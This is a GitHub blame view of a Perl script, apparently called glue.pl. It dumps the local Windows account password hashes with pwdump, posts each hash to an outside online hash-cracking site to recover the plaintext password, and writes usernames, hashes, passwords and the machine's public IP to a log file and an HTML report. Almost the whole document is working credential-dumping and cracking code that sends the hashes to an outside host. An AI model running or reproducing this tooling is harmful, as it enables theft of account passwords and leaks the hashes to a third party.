Skip to content
Newer
Older
100644 210 lines (150 sloc) 3.67 KB
91a8fb5 @mcandre first commit
authored
1 #!/usr/bin/env perl
2
3 use strict;
4
2171862 @mcandre removed curl as a dependency
authored
5 use LWP::UserAgent;
cd00a12 @mcandre added hashes to output
authored
6 use Time::HiRes qw(time);
91a8fb5 @mcandre first commit
authored
7
8 sub arch {
9 my $a = "32";
10
cd00a12 @mcandre added hashes to output
authored
11 $a = "64" if lc $ENV{'PROCESSOR_ARCHITECTURE'} eq "amd64";
12 $a = "64" if lc $ENV{'PROCESSOR_ARCHITEW6432'} eq "amd64";
91a8fb5 @mcandre first commit
authored
13
14 return $a;
15 }
16
17 sub os {
18 my $o = $^O;
19
2171862 @mcandre removed curl as a dependency
authored
20 if ($o eq "MSWin32" or $o eq "cygwin") {
21 $o = "windows";
22 }
23 elsif ($o eq "linux") {
24 $o = "linux";
25 }
26 elsif ($o eq "darwin") {
27 $o = "mac";
91a8fb5 @mcandre first commit
authored
28 }
29 else {
2171862 @mcandre removed curl as a dependency
authored
30 $o = "unix";
91a8fb5 @mcandre first commit
authored
31 }
32
33 return $o;
34 }
35
2171862 @mcandre removed curl as a dependency
authored
36 sub curl {
37 my ($url, $method, $headers) = @_;
38
39 my $ua = LWP::UserAgent->new;
40
41 my $req = "";
42
43 if ($method eq "post") {
44 $req = HTTP::Request->new(POST => $url);
45
46 $req->content_type("application/x-www-form-urlencoded");
47 $req->content($headers);
48 }
49 else {
50 $req = HTTP::Request->new(GET => $url);
51 }
52
53 my $res = $ua->request($req);
54
55 if ($res->is_success) {
56 return $res->content;
57 }
58 else {
59 return "error";
60 }
61 }
62
63 sub default_web_browser {
64 my $browser = "open"; # mac
65
66 my $o = os;
67 if ($o eq "linux") {
68 $browser = "x-www-browser";
69 }
70 elsif ($o eq "windows") {
71 $browser = "start";
72 }
73
74 return $browser;
75 }
76
91a8fb5 @mcandre first commit
authored
77 sub canhazip {
2171862 @mcandre removed curl as a dependency
authored
78 my $ip = curl("http://icanhazip.com", "get", "");
91a8fb5 @mcandre first commit
authored
79 $ip =~ s/\n//;
80
81 return $ip;
82 }
83
84 sub dump_accounts {
85 my $a = arch;
86 my $flag64 = "";
87 $flag64 = "-x" unless $a eq "32";
88
89 my $command = "pwdump $flag64 127.0.0.1 2>&1";
90 my $output = qx($command);
91
92 my $accounts = {};
93
94 while ($output =~ m/(.*):[0-9]+:.*:([a-zA-Z0-9]+):::/g) {
95 my ($username, $hash) = ($1, $2);
96 $accounts->{$username} = $hash;
97 }
98
99 return $accounts;
100 }
101
102 sub rainbow {
103 my $hash = shift;
104
105 my $password = "";
106
3b98f31 @mcandre added credits
authored
107 my $delay = 2; # sec
108 sleep $delay; # prevent DoS
109
2171862 @mcandre removed curl as a dependency
authored
110 my $output = curl("http://www.onlinehashcrack.com/free-hash-reverse.php", "post", "hashToSearch=$hash&searchHash=Search");
91a8fb5 @mcandre first commit
authored
111
112 if ($output =~ m/letter\-spacing:1\.2px">(.*)<\/b><br \/>/) {
113 $password = $1;
114 }
115
116 return $password;
117 }
118
119 sub record {
cd00a12 @mcandre added hashes to output
authored
120 my ($ip, $encrypted_accounts, $decrypted_accounts, $webpage) = @_;
121
122 my $t = time; # ms
91a8fb5 @mcandre first commit
authored
123
cd00a12 @mcandre added hashes to output
authored
124 my $record_filename = "$t.log";
91a8fb5 @mcandre first commit
authored
125
cd00a12 @mcandre added hashes to output
authored
126 print "Recording in $record_filename\n";
91a8fb5 @mcandre first commit
authored
127
128 open(RECORD, ">$record_filename");
129
cd00a12 @mcandre added hashes to output
authored
130 print RECORD "IP Address: $ip\n";
131
132 for my $username (keys %$encrypted_accounts) {
133 my $hash = $encrypted_accounts->{$username};
134 my $password = $decrypted_accounts->{$username};
135
136 print "\nUsername: $username\n";
137 print "Hash: $hash\n";
138 print "Password: $password\n\n";
139
91a8fb5 @mcandre first commit
authored
140 print RECORD "Username: $username\n";
cd00a12 @mcandre added hashes to output
authored
141 print RECORD "Hash: $hash\n";
91a8fb5 @mcandre first commit
authored
142 print RECORD "Password: $password\n\n";
143 }
144
145 close(RECORD);
146
147 my $begin_content = <<END;
148 <html>
149 <head>
150 <title>Report</title>
151 <link rel="stylesheet" href="stylesheet.css" type="text/css" />
152 </head>
153 <body>
154 <center>
cd00a12 @mcandre added hashes to output
authored
155 <h1>Accounts on this computer ($ip)</h1>
3b98f31 @mcandre added credits
authored
156 <h4><a href="https://github.com/mcandre/glue">glue.pl</a></h4>
91a8fb5 @mcandre first commit
authored
157 END
158
159 my $end_content = <<END;
160 </center>
161 </body>
162 </html>
163 END
164
165 open(WEBPAGE, ">$webpage");
166
167 print WEBPAGE $begin_content;
168
cd00a12 @mcandre added hashes to output
authored
169 for my $username (keys %$encrypted_accounts) {
170 my $hash = $encrypted_accounts->{$username};
171 my $password = $decrypted_accounts->{$username};
172
173 my $account = "<h3>$username / $hash ";
174
175 $account .= "/ <span class=\"password\">$password</span>" if $password ne "";
176
177 $account .= "</h3>";
3b98f31 @mcandre added credits
authored
178
179 print WEBPAGE $account;
91a8fb5 @mcandre first commit
authored
180 }
181
182 print WEBPAGE $end_content;
183
184 close(WEBPAGE);
185 }
186
187 sub show {
cd00a12 @mcandre added hashes to output
authored
188 my ($webpage) = @_;
91a8fb5 @mcandre first commit
authored
189
2171862 @mcandre removed curl as a dependency
authored
190 my $browser = default_web_browser;
191 my $command = "$browser $webpage";
3b98f31 @mcandre added credits
authored
192 system $command;
91a8fb5 @mcandre first commit
authored
193 }
194
3f5d045 @mcandre packaged script as executable
authored
195 my $ip = canhazip;
91a8fb5 @mcandre first commit
authored
196
cd00a12 @mcandre added hashes to output
authored
197 print "Accounts on this computer ($ip)\n";
2171862 @mcandre removed curl as a dependency
authored
198
3f5d045 @mcandre packaged script as executable
authored
199 my $encrypted_accounts = dump_accounts;
200 my $decrypted_accounts = {};
91a8fb5 @mcandre first commit
authored
201
3f5d045 @mcandre packaged script as executable
authored
202 while (my ($username, $hash) = each(%$encrypted_accounts)) {
203 my $password = rainbow $hash;
204 $decrypted_accounts->{$username} = $password;
91a8fb5 @mcandre first commit
authored
205 }
206
3f5d045 @mcandre packaged script as executable
authored
207 my $webpage = "report.html";
208
cd00a12 @mcandre added hashes to output
authored
209 record($ip, $encrypted_accounts, $decrypted_accounts, $webpage);
210 show($webpage);
Something went wrong with that request. Please try again.